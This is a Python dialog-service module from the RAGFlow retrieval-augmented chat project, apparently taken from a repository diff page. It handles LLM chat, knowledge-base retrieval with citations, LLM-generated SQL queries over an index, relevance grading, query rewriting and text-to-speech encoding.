||||
|
||||
问题如下:
|
||||
{}
|
||||
请写出SQL, 且只要SQL,不要有其他说明及文字。
|
||||
""".format(
|
||||
index_name(tenant_id),
|
||||
"\n".join([f"{k}: {v}" for k, v in field_map.items()]),
|
||||
question
|
||||
)
|
||||
tried_times = 0
|
||||
|
||||
def get_table():
|
||||
nonlocal sys_prompt, user_promt, question, tried_times
|
||||
sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
|
||||
"temperature": 0.06})
|
||||
print(user_promt, sql)
|
||||
chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
|
||||
sql = re.sub(r"[\r\n]+", " ", sql.lower())
|
||||
sql = re.sub(r".*select ", "select ", sql.lower())
|
||||
sql = re.sub(r" +", " ", sql)
|
||||
sql = re.sub(r"([;;]|```).*", "", sql)
|
||||
if sql[:len("select ")] != "select ":
|
||||
return None, None
|
||||
if not re.search(r"((sum|avg|max|min)\(|group by )", sql.lower()):
|
||||
if sql[:len("select *")] != "select *":
|
||||
sql = "select doc_id,docnm_kwd," + sql[6:]
|
||||
else:
|
||||
flds = []
|
||||
for k in field_map.keys():
|
||||
if k in forbidden_select_fields4resume:
|
||||
continue
|
||||
if len(flds) > 11:
|
||||
break
|
||||
flds.append(k)
|
||||
sql = "select doc_id,docnm_kwd," + ",".join(flds) + sql[8:]
|
||||
|
||||
print(f"“{question}” get SQL(refined): {sql}")
|
||||
|
||||
chat_logger.info(f"“{question}” get SQL(refined): {sql}")
|
||||
tried_times += 1
|
||||
return retrievaler.sql_retrieval(sql, format="json"), sql
|
||||
|
||||
tbl, sql = get_table()
|
||||
if tbl is None:
|
||||
return None
|
||||
if tbl.get("error") and tried_times <= 2:
|
||||
user_promt = """
|
||||
表名:{};
|
||||
数据库表字段说明如下:
|
||||
{}
|
||||
|
||||
问题如下:
|
||||
{}
|
||||
|
||||
你上一次给出的错误SQL如下:
|
||||
{}
|
||||
|
||||
后台报错如下:
|
||||
{}
|
||||
|
||||
请纠正SQL中的错误再写一遍,且只要SQL,不要有其他说明及文字。
|
||||
""".format(
|
||||
index_name(tenant_id),
|
||||
"\n".join([f"{k}: {v}" for k, v in field_map.items()]),
|
||||
question, sql, tbl["error"]
|
||||
)
|
||||
tbl, sql = get_table()
|
||||
chat_logger.info("TRY it again: {}".format(sql))
|
||||
|
||||
chat_logger.info("GET table: {}".format(tbl))
|
||||
print(tbl)
|
||||
if tbl.get("error") or len(tbl["rows"]) == 0:
|
||||
return None
|
||||
|
||||
docid_idx = set([ii for ii, c in enumerate(
|
||||
tbl["columns"]) if c["name"] == "doc_id"])
|
||||
docnm_idx = set([ii for ii, c in enumerate(
|
||||
tbl["columns"]) if c["name"] == "docnm_kwd"])
|
||||
clmn_idx = [ii for ii in range(
|
||||
len(tbl["columns"])) if ii not in (docid_idx | docnm_idx)]
|
||||
|
||||
# compose markdown table
|
||||
clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
|
||||
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
|
||||
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
|
||||
rows = ["|" +
|
||||
"|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
|
||||
"|" for r in tbl["rows"]]
|
||||
if quota:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
|
||||
|
||||
if not docid_idx or not docnm_idx:
|
||||
chat_logger.warning("SQL missing field: " + sql)
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [], "doc_aggs": []}
|
||||
}
|
||||
|
||||
docid_idx = list(docid_idx)[0]
|
||||
docnm_idx = list(docnm_idx)[0]
|
||||
doc_aggs = {}
|
||||
for r in tbl["rows"]:
|
||||
if r[docid_idx] not in doc_aggs:
|
||||
doc_aggs[r[docid_idx]] = {"doc_name": r[docnm_idx], "count": 0}
|
||||
doc_aggs[r[docid_idx]]["count"] += 1
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
|
||||
}
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import binascii
|
||||
import os
|
||||
import json
|
||||
import re
|
||||
from copy import deepcopy
|
||||
from timeit import default_timer as timer
|
||||
from api.db import LLMType, ParserType
|
||||
from api.db.db_models import Dialog, Conversation
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
|
||||
from api.settings import chat_logger, retrievaler, kg_retrievaler
|
||||
from rag.app.resume import forbidden_select_fields4resume
|
||||
from rag.nlp import keyword_extraction
|
||||
from rag.nlp.search import index_name
|
||||
from rag.utils import rmSpace, num_tokens_from_string, encoder
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
|
||||
|
||||
class DialogService(CommonService):
|
||||
model = Dialog
|
||||
|
||||
|
||||
class ConversationService(CommonService):
|
||||
model = Conversation
|
||||
|
||||
|
||||
def message_fit_in(msg, max_length=4000):
|
||||
def count():
|
||||
nonlocal msg
|
||||
tks_cnts = []
|
||||
for m in msg:
|
||||
tks_cnts.append(
|
||||
{"role": m["role"], "count": num_tokens_from_string(m["content"])})
|
||||
total = 0
|
||||
for m in tks_cnts:
|
||||
total += m["count"]
|
||||
return total
|
||||
|
||||
c = count()
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
msg_ = [m for m in msg[:-1] if m["role"] == "system"]
|
||||
msg_.append(msg[-1])
|
||||
msg = msg_
|
||||
c = count()
|
||||
if c < max_length:
|
||||
return c, msg
|
||||
|
||||
ll = num_tokens_from_string(msg_[0]["content"])
|
||||
l = num_tokens_from_string(msg_[-1]["content"])
|
||||
if ll / (ll + l) > 0.8:
|
||||
m = msg_[0]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[0]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
m = msg_[1]["content"]
|
||||
m = encoder.decode(encoder.encode(m)[:max_length - l])
|
||||
msg[1]["content"] = m
|
||||
return max_length, msg
|
||||
|
||||
|
||||
def llm_id2llm_type(llm_id):
|
||||
fnm = os.path.join(get_project_base_directory(), "conf")
|
||||
llm_factories = json.load(open(os.path.join(fnm, "llm_factories.json"), "r"))
|
||||
for llm_factory in llm_factories["factory_llm_infos"]:
|
||||
for llm in llm_factory["llm"]:
|
||||
if llm_id == llm["llm_name"]:
|
||||
return llm["model_type"].strip(",")[-1]
|
||||
|
||||
|
||||
def chat(dialog, messages, stream=True, **kwargs):
|
||||
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
|
||||
st = timer()
|
||||
llm = LLMService.query(llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
|
||||
if not llm:
|
||||
raise LookupError("LLM(%s) not found" % dialog.llm_id)
|
||||
max_tokens = 8192
|
||||
else:
|
||||
max_tokens = llm[0].max_tokens
|
||||
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
if len(embd_nms) != 1:
|
||||
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
|
||||
|
||||
is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
|
||||
retr = retrievaler if not is_kg else kg_retrievaler
|
||||
|
||||
questions = [m["content"] for m in messages if m["role"] == "user"][-3:]
|
||||
attachments = kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None
|
||||
if "doc_ids" in messages[-1]:
|
||||
attachments = messages[-1]["doc_ids"]
|
||||
for m in messages[:-1]:
|
||||
if "doc_ids" in m:
|
||||
attachments.extend(m["doc_ids"])
|
||||
|
||||
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
if llm_id2llm_type(dialog.llm_id) == "image2text":
|
||||
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.IMAGE2TEXT, dialog.llm_id)
|
||||
else:
|
||||
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
|
||||
|
||||
prompt_config = dialog.prompt_config
|
||||
field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
|
||||
tts_mdl = None
|
||||
if prompt_config.get("tts"):
|
||||
tts_mdl = LLMBundle(dialog.tenant_id, LLMType.TTS)
|
||||
# try to use sql if field mapping is good to go
|
||||
if field_map:
|
||||
chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
|
||||
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
|
||||
if ans:
|
||||
yield ans
|
||||
return
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["key"] == "knowledge":
|
||||
continue
|
||||
if p["key"] not in kwargs and not p["optional"]:
|
||||
raise KeyError("Miss parameter: " + p["key"])
|
||||
if p["key"] not in kwargs:
|
||||
prompt_config["system"] = prompt_config["system"].replace(
|
||||
"{%s}" % p["key"], " ")
|
||||
|
||||
rerank_mdl = None
|
||||
if dialog.rerank_id:
|
||||
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
|
||||
|
||||
for _ in range(len(questions) // 2):
|
||||
questions.append(questions[-1])
|
||||
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
|
||||
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
|
||||
else:
|
||||
if prompt_config.get("keyword", False):
|
||||
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
|
||||
kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
|
||||
dialog.similarity_threshold,
|
||||
dialog.vector_similarity_weight,
|
||||
doc_ids=attachments,
|
||||
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
chat_logger.info(
|
||||
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
|
||||
retrieval_tm = timer()
|
||||
|
||||
if not knowledges and prompt_config.get("empty_response"):
|
||||
empty_res = prompt_config["empty_response"]
|
||||
yield {"answer": empty_res, "reference": kbinfos, "audio_binary": tts(tts_mdl, empty_res)}
|
||||
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
|
||||
|
||||
kwargs["knowledge"] = "\n------\n".join(knowledges)
|
||||
gen_conf = dialog.llm_setting
|
||||
|
||||
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
|
||||
msg.extend([{"role": m["role"], "content": re.sub(r"##\d+\$\$", "", m["content"])}
|
||||
for m in messages if m["role"] != "system"])
|
||||
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
|
||||
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
|
||||
prompt = msg[0]["content"]
|
||||
|
||||
if "max_tokens" in gen_conf:
|
||||
gen_conf["max_tokens"] = min(
|
||||
gen_conf["max_tokens"],
|
||||
max_tokens - used_token_count)
|
||||
|
||||
def decorate_answer(answer):
|
||||
nonlocal prompt_config, knowledges, kwargs, kbinfos, prompt, retrieval_tm
|
||||
refs = []
|
||||
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
|
||||
answer, idx = retr.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
[ck["vector"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
embd_mdl,
|
||||
tkweight=1 - dialog.vector_similarity_weight,
|
||||
vtweight=dialog.vector_similarity_weight)
|
||||
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
|
||||
recall_docs = [
|
||||
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
|
||||
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
|
||||
kbinfos["doc_aggs"] = recall_docs
|
||||
|
||||
refs = deepcopy(kbinfos)
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
done_tm = timer()
|
||||
prompt += "\n### Elapsed\n - Retrieval: %.1f ms\n - LLM: %.1f ms"%((retrieval_tm-st)*1000, (done_tm-st)*1000)
|
||||
return {"answer": answer, "reference": refs, "prompt": prompt}
|
||||
|
||||
if stream:
|
||||
last_ans = ""
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(prompt, msg[1:], gen_conf):
|
||||
answer = ans
|
||||
delta_ans = ans[len(last_ans):]
|
||||
if num_tokens_from_string(delta_ans) < 16:
|
||||
continue
|
||||
last_ans = answer
|
||||
yield {"answer": answer, "reference": {}, "audio_binary": tts(tts_mdl, delta_ans)}
|
||||
delta_ans = answer[len(last_ans):]
|
||||
if delta_ans:
|
||||
yield {"answer": answer, "reference": {}, "audio_binary": tts(tts_mdl, delta_ans)}
|
||||
yield decorate_answer(answer)
|
||||
else:
|
||||
answer = chat_mdl.chat(prompt, msg[1:], gen_conf)
|
||||
chat_logger.info("User: {}|Assistant: {}".format(
|
||||
msg[-1]["content"], answer))
|
||||
res = decorate_answer(answer)
|
||||
res["audio_binary"] = tts(tts_mdl, answer)
|
||||
yield res
|
||||
|
||||
|
||||
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
|
||||
sys_prompt = "你是一个DBA。你需要这对以下表的字段结构,根据用户的问题列表,写出最后一个问题对应的SQL。"
|
||||
user_promt = """
|
||||
表名:{};
|
||||
数据库表字段说明如下:
|
||||
{}
|
||||
|
||||
问题如下:
|
||||
{}
|
||||
请写出SQL, 且只要SQL,不要有其他说明及文字。
|
||||
""".format(
|
||||
index_name(tenant_id),
|
||||
"\n".join([f"{k}: {v}" for k, v in field_map.items()]),
|
||||
question
|
||||
)
|
||||
tried_times = 0
|
||||
|
||||
def get_table():
|
||||
nonlocal sys_prompt, user_promt, question, tried_times
|
||||
sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
|
||||
"temperature": 0.06})
|
||||
print(user_promt, sql)
|
||||
chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
|
||||
sql = re.sub(r"[\r\n]+", " ", sql.lower())
|
||||
sql = re.sub(r".*select ", "select ", sql.lower())
|
||||
sql = re.sub(r" +", " ", sql)
|
||||
sql = re.sub(r"([;;]|```).*", "", sql)
|
||||
if sql[:len("select ")] != "select ":
|
||||
return None, None
|
||||
if not re.search(r"((sum|avg|max|min)\(|group by )", sql.lower()):
|
||||
if sql[:len("select *")] != "select *":
|
||||
sql = "select doc_id,docnm_kwd," + sql[6:]
|
||||
else:
|
||||
flds = []
|
||||
for k in field_map.keys():
|
||||
if k in forbidden_select_fields4resume:
|
||||
continue
|
||||
if len(flds) > 11:
|
||||
break
|
||||
flds.append(k)
|
||||
sql = "select doc_id,docnm_kwd," + ",".join(flds) + sql[8:]
|
||||
|
||||
print(f"“{question}” get SQL(refined): {sql}")
|
||||
|
||||
chat_logger.info(f"“{question}” get SQL(refined): {sql}")
|
||||
tried_times += 1
|
||||
return retrievaler.sql_retrieval(sql, format="json"), sql
|
||||
|
||||
tbl, sql = get_table()
|
||||
if tbl is None:
|
||||
return None
|
||||
if tbl.get("error") and tried_times <= 2:
|
||||
user_promt = """
|
||||
表名:{};
|
||||
数据库表字段说明如下:
|
||||
{}
|
||||
|
||||
问题如下:
|
||||
{}
|
||||
|
||||
你上一次给出的错误SQL如下:
|
||||
{}
|
||||
|
||||
后台报错如下:
|
||||
{}
|
||||
|
||||
请纠正SQL中的错误再写一遍,且只要SQL,不要有其他说明及文字。
|
||||
""".format(
|
||||
index_name(tenant_id),
|
||||
"\n".join([f"{k}: {v}" for k, v in field_map.items()]),
|
||||
question, sql, tbl["error"]
|
||||
)
|
||||
tbl, sql = get_table()
|
||||
chat_logger.info("TRY it again: {}".format(sql))
|
||||
|
||||
chat_logger.info("GET table: {}".format(tbl))
|
||||
print(tbl)
|
||||
if tbl.get("error") or len(tbl["rows"]) == 0:
|
||||
return None
|
||||
|
||||
docid_idx = set([ii for ii, c in enumerate(
|
||||
tbl["columns"]) if c["name"] == "doc_id"])
|
||||
docnm_idx = set([ii for ii, c in enumerate(
|
||||
tbl["columns"]) if c["name"] == "docnm_kwd"])
|
||||
clmn_idx = [ii for ii in range(
|
||||
len(tbl["columns"])) if ii not in (docid_idx | docnm_idx)]
|
||||
|
||||
# compose markdown table
|
||||
clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
|
||||
tbl["columns"][i]["name"])) for i in
|
||||
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
|
||||
|
||||
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
|
||||
("|------|" if docid_idx and docid_idx else "")
|
||||
|
||||
rows = ["|" +
|
||||
"|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
|
||||
"|" for r in tbl["rows"]]
|
||||
if quota:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
else:
|
||||
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
|
||||
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
|
||||
|
||||
if not docid_idx or not docnm_idx:
|
||||
chat_logger.warning("SQL missing field: " + sql)
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [], "doc_aggs": []},
|
||||
"prompt": sys_prompt
|
||||
}
|
||||
|
||||
docid_idx = list(docid_idx)[0]
|
||||
docnm_idx = list(docnm_idx)[0]
|
||||
doc_aggs = {}
|
||||
for r in tbl["rows"]:
|
||||
if r[docid_idx] not in doc_aggs:
|
||||
doc_aggs[r[docid_idx]] = {"doc_name": r[docnm_idx], "count": 0}
|
||||
doc_aggs[r[docid_idx]]["count"] += 1
|
||||
return {
|
||||
"answer": "\n".join([clmns, line, rows]),
|
||||
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
|
||||
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
|
||||
doc_aggs.items()]},
|
||||
"prompt": sys_prompt
|
||||
}
|
||||
|
||||
|
||||
def relevant(tenant_id, llm_id, question, contents: list):
|
||||
if llm_id2llm_type(llm_id) == "image2text":
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
|
||||
else:
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
if not contents:return False
|
||||
contents = "Documents: \n" + " - ".join(contents)
|
||||
contents = f"Question: {question}\n" + contents
|
||||
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
|
||||
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
|
||||
if ans.lower().find("yes") >= 0: return True
|
||||
return False
|
||||
|
||||
|
||||
def rewrite(tenant_id, llm_id, question):
|
||||
if llm_id2llm_type(llm_id) == "image2text":
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
|
||||
else:
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
|
||||
prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
|
||||
return ans
|
||||
|
||||
|
||||
def tts(tts_mdl, text):
|
||||
if not tts_mdl or not text: return
|
||||
bin = b""
|
||||
for chunk in tts_mdl.tts(text):
|
||||
bin += chunk
|
||||
return binascii.hexlify(bin).decode("utf-8")
|
||||
|
||||
|
||||
def ask(question, kb_ids, tenant_id):
|
||||
kbs = KnowledgebaseService.get_by_ids(kb_ids)
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
|
||||
is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
|
||||
retr = retrievaler if not is_kg else kg_retrievaler
|
||||
|
||||
embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT)
|
||||
max_tokens = chat_mdl.max_length
|
||||
|
||||
kbinfos = retr.retrieval(question, embd_mdl, tenant_id, kb_ids, 1, 12, 0.1, 0.3, aggs=False)
|
||||
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
|
||||
|
||||
used_token_count = 0
|
||||
for i, c in enumerate(knowledges):
|
||||
used_token_count += num_tokens_from_string(c)
|
||||
if max_tokens * 0.97 < used_token_count:
|
||||
knowledges = knowledges[:i]
|
||||
break
|
||||
|
||||
prompt = """
|
||||
Role: You're a smart assistant. Your name is Miss R.
|
||||
Task: Summarize the information from knowledge bases and answer user's question.
|
||||
Requirements and restriction:
|
||||
- DO NOT make things up, especially for numbers.
|
||||
- If the information from knowledge is irrelevant with user's question, JUST SAY: Sorry, no relevant information provided.
|
||||
- Answer with markdown format text.
|
||||
- Answer in language of user's question.
|
||||
- DO NOT make things up, especially for numbers.
|
||||
|
||||
### Information from knowledge bases
|
||||
%s
|
||||
|
||||
The above is information from knowledge bases.
|
||||
|
||||
"""%"\n".join(knowledges)
|
||||
msg = [{"role": "user", "content": question}]
|
||||
|
||||
def decorate_answer(answer):
|
||||
nonlocal knowledges, kbinfos, prompt
|
||||
answer, idx = retr.insert_citations(answer,
|
||||
[ck["content_ltks"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
[ck["vector"]
|
||||
for ck in kbinfos["chunks"]],
|
||||
embd_mdl,
|
||||
tkweight=0.7,
|
||||
vtweight=0.3)
|
||||
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
|
||||
recall_docs = [
|
||||
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
|
||||
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
|
||||
kbinfos["doc_aggs"] = recall_docs
|
||||
refs = deepcopy(kbinfos)
|
||||
for c in refs["chunks"]:
|
||||
if c.get("vector"):
|
||||
del c["vector"]
|
||||
|
||||
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
|
||||
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
|
||||
return {"answer": answer, "reference": refs}
|
||||
|
||||
answer = ""
|
||||
for ans in chat_mdl.chat_streamly(prompt, msg, {"temperature": 0.1}):
|
||||
answer = ans
|
||||
yield {"answer": answer, "reference": {}}
|
||||
yield decorate_answer(answer)
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user